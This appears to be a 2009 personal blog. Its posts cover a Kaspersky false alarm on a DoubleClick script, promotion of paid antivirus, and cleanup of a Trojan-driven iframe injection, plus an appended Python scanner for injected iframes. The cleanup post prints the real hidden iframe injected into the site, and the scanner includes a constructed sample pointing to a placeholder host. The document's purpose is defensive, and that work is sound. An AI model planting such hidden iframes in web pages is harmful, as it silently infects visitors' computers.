
Wednesday, November 25, 2009

What is http://googleads.g.doubleclick.net/pagead/test_domain.js ?


I was getting the Kaspersky Security Alert stated below every time I browsed websites with Google AdSense content advertisements in them.

"Application Google Chrome contains link to web page http://googleads.g.doubleclick.net/pagead/test_domain.js used to steal password, credit card number or other confidential data. Denied"

So, I got a bit worried about whether this virus threat was a real threat or a false alert, so I just browsed the Net to find out more about googleads.g.doubleclick.net

I found out that there is nothing to worry about: as Google bought DoubleClick in 2007, they have some integration things to sort out, and there is no harm.

To confirm the status, I sent an email to Kaspersky Virus Lab as stated below and the Virus analyst confirmed it was a false alarm.

newvirus[at]kaspersky[dot]com Mon, Nov 23, 2009 at 2:50 AM

To: Me
Hello,

Sorry, it was a false detection. It will be fixed in the next update.
Thank you for your help.

>
> LANG: en
> email: Me
> product: Kaspersky Internet Security 8.0.0.506
> viruses_date: Today
>
> description:
> I am getting a Kaspersky Security Alert every time I browse a website with Google AdSense code in it. It is giving the following alert. How do I solve this problem? I have attached the screenshot of the alert.
>
> 11/23/2009 1:47:58 AM?http://googleads.g.doubleclick.net/pagead/test_domain.js?C:\Program Files\MOZILLA FIREFOX\?FIREFOX.EXE?532?"C:\Program Files\Mozilla Firefox\firefox.exe" ?Detected: googleads.g.doubleclick.net/*?Databases
>
> uploaded files:
> kaspersky-security-alert.jpg
>
>
--------------------
Regards,
Virus analyst, Kaspersky Lab.


Wednesday, October 14, 2009

How to scan a file for viruses without antivirus software.

You just downloaded a file from the Internet but don't have paid antivirus software to check the file for viruses.

One way to check the file for any virus and be certain that the file is not malicious is to use Kaspersky Online Scanner.

Open your browser: Mozilla, IE or Google Chrome.

Go to http://support.kaspersky.com/viruses/online

Click Choose File. Select the file you want to check and then click the Submit button.

Once you have clicked the Submit button, the suspected file will be uploaded from your computer to a special server and scanned using Kaspersky Anti-Virus.

It has an exceptional virus detection level and its virus database pattern is updated every three hours.

Wait a few moments. Kaspersky Online Scanner will report whether the file is infected or not.

The only limitation of this facility is that you can check only a file smaller than 1 MB at any one time.

If you have several files, create an archive file (in zip, arj or similar format) smaller than 1 MB and submit the archive file.











Buy A Paid Antivirus Software to protect your information.




Last time I was using one of the best free antivirus programs, but it failed to protect my computer from a Trojan virus and phishing sites.

I was using free antivirus, free anti-malware and spyware software.

My personal computer got infected and this virus damaged most of my website and my client's website.

If your PC is infected, its CPU usage will always be high even when you are not doing much or running many programs.

In addition, your outgoing traffic will be higher than normal. It is sending information to the hacker, and in my case the Trojan was accessing my website and causing iframe injection.

In layman's terms, my web pages got corrupted.

Buy a good paid antivirus; you will have some peace of mind, and they will provide technical support to detect any virus that might reside in your PC.

I am using Kaspersky Internet Security for my laptop and desktop; please refer to this article for their support in solving my virus problem.

After using Kaspersky and cleaning my PC of any virus, thank God, it didn't recur.

Plus, I have taken some other measures to protect my PC and additional precautions when accessing my website, using the latest FTP software.

I am getting protection from cybercriminals, and it protects my PC while I am surfing the Internet.

A few months back, I was active on Traffic Exchange sites to promote my affiliate marketing; while I was surfing, Kaspersky managed to block my PC from being infected with Trojans and other malware.


Other protections that you will get with Kaspersky Internet Security are as follows:

1. It keeps your money and identity safe. Always clear your cache and cookies after making any financial transaction via the Internet.

2. Protects against bank account fraud. It protects you from phishing sites; please click here for more details about phishing.

3. Safeguards against online shopping threats.

4. Cybercriminals won’t hijack your PC; your PC will not be hijacked and turned into a zombie machine.

5. Once a PC is hijacked, hackers can easily read your keyboard keystrokes and create financial havoc for you.

6. Family protection from online predators.

7. Your files won’t be ruined by hackers the way mine were; now when I make an FTP connection it is much more secure.

8. Keeps your PC running smoothly.

Thursday, July 9, 2009

How to solve an iframe injection caused by Trojan malware


What is IFRAME?

The iframe tag defines an inline frame that contains another document. We use the iframe tag to include another document inside a website document.

For example, I use the following iframe code to insert Salesforce.com syndicated content inside my website. Please refer to the image below.

<iframe id="blockrandom"
        name="iframe" src="http://probyte2u.com/salesforce.html"
        width="100%"
        height="1300"
        scrolling="auto"
        align="top"
        frameborder="0"
        class="wrapper">
This option will not work correctly. Unfortunately, your browser does not support inline frames.
</iframe>






Basically, now you have a rough idea about IFRAME and its usage!

Now, what does IFRAME injection mean?

Iframe injection means attackers or hackers insert their iframe code inside your website's pages. They use Trojan malware to do it.

Normally they will target your index.html, index.php, default.php or configuration.php page.

They insert their code inside your website so that when visitors visit your page, they download the malicious code onto their personal computers, in order to replicate the process and also to retrieve the visitors' financial and identification details.

Their main purpose is financial gain, and some of them use it for political purposes. They can also infect a lot of PCs and use them to launch a Distributed Denial of Service (DDoS) attack against their target.

From my own personal experience, I first encountered this problem when I tried to access my website and got the following error.

Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85

So I checked in the index.php file and found the following code inserted inside the index.php file.

The iframe injection was not done properly: there was an additional "/" symbol at the start of the injected iframe, as shown below, so it was detected and the website code did not download the malicious code.

/<iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>

If the iframe injection had been done properly, all the visitors to the infected site would most probably have been infected with malware.

Sample of Mozilla Warning for Reported Attack Site shown below.


So what I did was remove the iframe injection from the infected file and upload the new files. Plus, I changed the FTP details for the website.

My site was safe for a few days; unfortunately, the same problem occurred after a while. I was suspicious about how the hacker was able to access my website.

So I checked with my hosting provider how my website was hacked.

Only then did I learn that my personal computer was most probably infected by a Trojan virus and the hacker had automated the whole process.

The Trojan virus managed to steal all my websites' usernames and passwords that were saved in the file transfer protocol software that I used. All the websites that I accessed using the FTP software were infected with the iframe injection.

Luckily, I had backup files for my website that were not infected.

Since a lot of the files had been infected, I had no other choice but to restore the entire site using the backup files. I changed my FTP username and password.

To prevent the problem from recurring I installed Kaspersky Internet Security, and there was no more iframe injection problem.

The root cause of my problem was that my antivirus (free version) couldn't detect the Trojan at all.

If your problem is not as serious as mine, then you could resolve the problem using the steps below.

How to eliminate this problem

Use the paid version of Kaspersky Antivirus, update the pattern and scan your computer. Clean all infected files on your computer.

How to clean the infected php or html pages in my web site?

1. Refer to a Google badware notice like this


Approximately 6 files have been injected. You can search your index.php and index.html for the injected lines of code.

You can also download copies of your public_html if there are too many injected files (zip the public_html, or zip it folder by folder). Uncompress the zip file on your desktop. Kaspersky will notify you of the injected files. Do not clean the files. Just save the log file so you can edit the files manually. Using this method, your pages will not be destroyed or altered by Kaspersky.

2. Change your FTP/cPanel login information. Avoid using the same password for web registration. Your FTP password should not be recycled. Some fake web sites would harvest this information and perform iframe injection over the web.

3. Sort your files by date in the FTP window. You can check the most recently edited pages (or those edited on the infection date) for injected code.

4. You can revert to a public_html backup – this method is not advisable and should be used as a last resort if you cannot find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected code.

5. Plus, remember not to save the username and password of your website inside your file transfer protocol software. From my own experience, the Trojan virus managed to steal the information from the FTP software.
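
One way to carry out the search in steps 1 and 3 on a downloaded copy of public_html is sketched below. It is an added example, not part of the original post: it flags iframe tags that are hidden or sized 0/1 pixel and lists the most recently modified files first. The function names, the `injected.example` host and the 0/1-pixel rule are assumptions that go beyond the single sample shown in the post.

```python
import re
import sys
import time
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
PAGE_EXT = {".php", ".html", ".htm"}

# Constructed sample shaped like the injected line in the post; the host is a placeholder.
SAMPLE_INJECTED = ('<iframe src="http://injected.example:8080/ts/in.cgi?x" '
                   'width=125 height=125 style="visibility: hidden"></iframe>')

def iframe_attrs(tag):
    """Parse attribute name/value pairs of one opening tag (quoted or bare values)."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag)}

def suspicious_reasons(tag, own_hosts=()):
    """Return why an iframe tag looks injected; an empty list means it looks normal."""
    a = iframe_attrs(tag)
    reasons = []
    style = a.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by style")
    if any(a.get(d, "") in ("0", "1") for d in ("width", "height")):
        reasons.append("0 or 1 pixel size")
    m = re.match(r"https?://([^/:?#]+)(:\d+)?", a.get("src", ""), re.IGNORECASE)
    if reasons and m and m.group(1).lower() not in own_hosts:
        reasons.append("external src " + m.group(1).lower() + (m.group(2) or ""))
    return reasons

def scan_tree(root, own_hosts=()):
    """Scan a downloaded copy of public_html; most recently modified files come first."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PAGE_EXT:
            continue
        text = path.read_text(errors="replace")
        for m in IFRAME_RE.finditer(text):
            reasons = suspicious_reasons(m.group(0), own_hosts)
            if reasons:
                line_no = text.count("\n", 0, m.start()) + 1
                findings.append((path.stat().st_mtime, str(path), line_no, reasons))
    return sorted(findings, reverse=True)

if __name__ == "__main__":
    for mtime, path, line_no, reasons in scan_tree(sys.argv[1]):
        stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        print(f"{stamp}  {path}:{line_no}  {'; '.join(reasons)}")
```

Run it against the unzipped copy on your desktop, not the live site, and edit the reported lines by hand before uploading the cleaned files.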